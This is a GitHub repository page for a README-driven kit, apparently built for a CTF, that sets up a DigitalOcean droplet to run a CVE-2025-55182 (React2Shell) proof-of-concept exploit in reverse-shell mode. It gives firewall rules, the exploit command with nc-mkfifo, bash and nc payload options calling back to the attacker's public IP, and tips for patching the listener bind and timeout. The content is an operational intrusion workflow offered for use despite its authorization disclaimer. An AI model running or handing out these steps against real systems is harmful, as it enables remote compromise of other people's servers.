Skip to content

Slothdemon22/ctf-nust

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
.gitignore
.gitignore
 
 
README.md
README.md
 
 
install.sh
install.sh
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

react2shell-listener-kit

Plug-and-play setup to run the CVE-2025-55182 (React2Shell) PoC reverse-shell mode from a machine with a real public IPv4 (e.g. DigitalOcean droplet). Includes a NAT-safe bind patch (listen on 0.0.0.0, callback IP from -l).

Use only on systems you own or are explicitly authorized to test.

Requirements (DigitalOcean)

  • Droplet: Ubuntu 22.04 or 24.04 (or any Linux with Python 3.10+).
  • Public IPv4 on the droplet (no extra NAT in front of the droplet).
  • Inbound TCP allowed on the port you choose (e.g. 4444):
    • Droplet firewall / DO Cloud Firewall: allow TCP 4444 from 0.0.0.0/0 (or restrict to the CTF egress if you know it).
    • OS: ufw allow 4444/tcp if you use UFW (SSH stays on 22).

One-time droplet bootstrap

SSH in as root or a sudo user, then:

sudo apt-get update
sudo apt-get install -y git python3 python3-venv python3-pip

Clone this kit (after you push it to GitHub), or copy the folder to the droplet:

git clone https://github.com/YOUR_USER/react2shell-listener-kit.git
cd react2shell-listener-kit
chmod +x install.sh
./install.sh

Every session

cd react2shell-listener-kit
source .venv/bin/activate
PUBLIC_IP=$(curl -sS --max-time 5 ifconfig.me || curl -sS --max-time 5 icanhazip.com)
echo "Using callback IP: $PUBLIC_IP"

Run reverse shell against the authorized target:

python3 CVE-2025-55182/exploit.py -u 'http://TARGET_HOST:PORT' \
  -r -l "$PUBLIC_IP" -p 4444 -P nc-mkfifo --timeout 60

Try -P bash or -P nc if nc-mkfifo fails on the remote app container.

Longer wait for callback

If the script times out waiting for a connection, edit CVE-2025-55182/exploit.py and increase server.settimeout(10) in _create_listener (e.g. to 120).

Python packages only (local venv)

From this repo root:

python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt

Then run ./install.sh once so CVE-2025-55182/ exists and is patched.

Why not bind the droplet’s public IP in Python?

On laptops behind home routers, the public IP is not configured on a local NIC, so bind(public_ip) fails. On a droplet the same pattern is still fragile (floating IP / metadata). Binding 0.0.0.0 accepts connections destined to any local address that reaches the listener; curl ifconfig.me gives the IP the victim should dial.

Create your GitHub repo

On your machine:

cd react2shell-listener-kit
git init
git add README.md requirements.txt install.sh .gitignore
git commit -m "Add DO-friendly React2Shell reverse listener kit"

Create an empty repo on GitHub (no README), then:

git remote add origin https://github.com/YOUR_USER/react2shell-listener-kit.git
git branch -M main
git push -u origin main

References

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages